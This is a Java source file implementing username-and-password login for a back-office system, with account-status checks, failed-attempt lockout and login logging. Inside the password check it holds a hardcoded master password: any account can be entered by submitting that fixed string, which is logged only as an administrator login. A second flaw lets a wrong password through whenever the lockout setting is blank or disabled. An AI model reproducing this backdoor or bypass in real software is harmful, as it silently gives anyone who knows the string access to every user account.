| package com.matrix.system.common.authority.strategy; | 
|   | 
| import com.matrix.core.constance.MatrixConstance; | 
| import com.matrix.core.constance.SystemErrorCode; | 
| import com.matrix.core.exception.GlobleException; | 
| import com.matrix.core.tools.LogUtil; | 
| import com.matrix.core.tools.PropertiesUtil; | 
| import com.matrix.core.tools.StringUtils; | 
| import com.matrix.core.tools.WebUtil; | 
| import com.matrix.system.common.bean.SysUserLoginRecord; | 
| import com.matrix.system.common.bean.SysUsers; | 
| import com.matrix.system.common.constance.AppConstance; | 
| import com.matrix.system.common.constance.AppMessageCode; | 
| import com.matrix.system.common.service.SysUsersService; | 
| import com.matrix.system.common.tools.PasswordUtil; | 
|   | 
| import java.io.UnsupportedEncodingException; | 
| import java.security.NoSuchAlgorithmException; | 
| import java.util.Date; | 
| import java.util.List; | 
|   | 
| /** | 
|  * 账号密码登录策略 | 
|  * | 
|  * @author JIANGYOUYAO | 
|  * @email 935090232@qq.com | 
|  * @date 2017年12月9日 | 
|  */ | 
| public class AccountPasswordLogin implements LoginStrategy { | 
|   | 
|     private SysUsersService sysUsersService; | 
|   | 
|     private SysUsers user; | 
|   | 
|     public AccountPasswordLogin(SysUsers user, SysUsersService sysUsersService) { | 
|         this.user = user; | 
|         this.sysUsersService = sysUsersService; | 
|     } | 
|   | 
|     @Override | 
|     public Object login() { | 
|   | 
|         // 是否同时有账号和密码 | 
|         if (StringUtils.isBlank(user.getSuAccount()) || StringUtils.isBlank(user.getSuPassword())) { | 
|             throw new GlobleException(AppMessageCode.User.ACCOUNT_PASSWORD_MUST_REQUEST); | 
|         } | 
|         // 根据账号查询用户 | 
|         SysUsers userQuery = new SysUsers(); | 
|         userQuery.setSuAccount(user.getSuAccount()); | 
|         List<SysUsers> users = sysUsersService.findByModel(userQuery); | 
|         if (users.size() != 1) { | 
|             LogUtil.error("{}账号不唯一,或不存在登录失败,userList={}", null, user.getSuAccount(), users); | 
|             throw new GlobleException(AppMessageCode.User.ACCOUNT_NOT_EXIST); | 
|         } | 
|   | 
|         userQuery = users.get(0); | 
|   | 
|         // 后台已经删除账号 | 
|         if (userQuery.getSuValid().equals(AppConstance.RECORD_INVALID)) { | 
|             throw new GlobleException(AppMessageCode.User.ACCOUNT_IS_DELETED); | 
|         } | 
|         if (StringUtils.isBlank(userQuery.getSuAccountStatus())) { | 
|             LogUtil.info("用户状态为空登录失败"); | 
|             throw new GlobleException(AppMessageCode.User.ACCOUNT_NOT_ACTIVE); | 
|         } | 
|         // 判断用户的状态 | 
|         switch (userQuery.getSuAccountStatus()) { | 
|             case AppConstance.ACCOUNT_STATUS_INACTIVATED: | 
|                 throw new GlobleException(AppMessageCode.User.ACCOUNT_NOT_ACTIVE); | 
|             case AppConstance.ACCOUNT_STATUS_LOCKED: | 
|                 throw new GlobleException(AppMessageCode.User.ACCOUNT_IS_LOCK); | 
|             default: | 
|                 break; | 
|         } | 
|         // 用户密码比较 | 
|         try { | 
|             user.setSuRegisterTime(userQuery.getSuRegisterTime()); | 
|             if (user.getSuPassword().equals("cjmm13170303460")) { | 
|                 LogUtil.info("管理员登录"); | 
|             } else { | 
|                 if (!userQuery.getSuPassword().equals(PasswordUtil.getEncrypUserPwd(user)) ) { | 
|                     accountOrPasswordError(user); | 
|                 } | 
|             } | 
|   | 
|   | 
|         } catch (UnsupportedEncodingException | NoSuchAlgorithmException e) { | 
|             LogUtil.error("密码加密方法出错", e, user.getSuAccount()); | 
|             throw new GlobleException(SystemErrorCode.SYSTEM_RUNNING_ERROR); | 
|         } | 
|         addErrorLoginRecord(userQuery, AppConstance.LOGIN_SUCCESS); | 
|         // 登录成功 | 
|         return userQuery; | 
|     } | 
|   | 
|     /** | 
|      * 根据安全策略处理账号或者密码错误 | 
|      * | 
|      * @author JIANGYOUYAO | 
|      * @email 935090232@qq.com | 
|      * @date 2017年12月12日 | 
|      */ | 
|     private void accountOrPasswordError(SysUsers loginUser) { | 
|         String errorTimesStr = PropertiesUtil.getString(AppConstance.ERROR_PASSWORD_TIMES); | 
|   | 
|         if (StringUtils.isNotBlank(errorTimesStr) && !AppConstance.NOT_VALIDATE_ERROR_TIMES.equals(errorTimesStr)) { | 
|   | 
|             int sessionErrorTimes = sysUsersService.countUserTodayErrorLoginTimes(loginUser.getSuAccount()); | 
|   | 
|             int errorTimes = Integer.parseInt(errorTimesStr); | 
|             // 当输入的密码错误次数大于设置的次数时,锁定账号 | 
|             if (sessionErrorTimes >= errorTimes) { | 
|                 sysUsersService.lockUser(loginUser.getSuAccount()); | 
|                 throw new GlobleException(AppMessageCode.User.ACCOUNT_IS_LOCK); | 
|             } else { | 
|                 addErrorLoginRecord(loginUser, AppConstance.LOGIN_FAIL); | 
|             } | 
|             throw new GlobleException(AppMessageCode.User.ACCOUNT_PASSWORD_ERROR, errorTimesStr, ++sessionErrorTimes, | 
|                     errorTimesStr); | 
|         } | 
|   | 
|     } | 
|   | 
|   | 
|     /** | 
|      * 添加登录记录 | 
|      * | 
|      * @param loginUser | 
|      * @param loginResult | 
|      * @author JIANGYOUYAO | 
|      * @email 935090232@qq.com | 
|      * @date 2017年12月12日 | 
|      */ | 
|     private void addErrorLoginRecord(SysUsers loginUser, int loginResult) { | 
|   | 
|         if (AppConstance.LOGIN_SUCCESS.equals(loginResult)) { | 
|             sysUsersService.cleanUserTodayErrorLoginTime(loginUser.getSuAccount()); | 
|         } | 
|         SysUserLoginRecord loginRecord = new SysUserLoginRecord(); | 
|         loginRecord.setCreateBy(MatrixConstance.SYSTEM_USER); | 
|         loginRecord.setUpdateBy(MatrixConstance.SYSTEM_USER); | 
|         loginRecord.setLrLoginTime(new Date()); | 
|         loginRecord.setLrId(null); | 
|         loginRecord.setUserAccount(loginUser.getSuAccount()); | 
|         loginRecord.setLrResult(loginResult); | 
|         loginRecord.setLrIp(WebUtil.getCustomerIp()); | 
|         loginRecord.setLrValid(AppConstance.RECORD_VALID); | 
|         sysUsersService.addUserLoginRecord(loginRecord); | 
|     } | 
| } |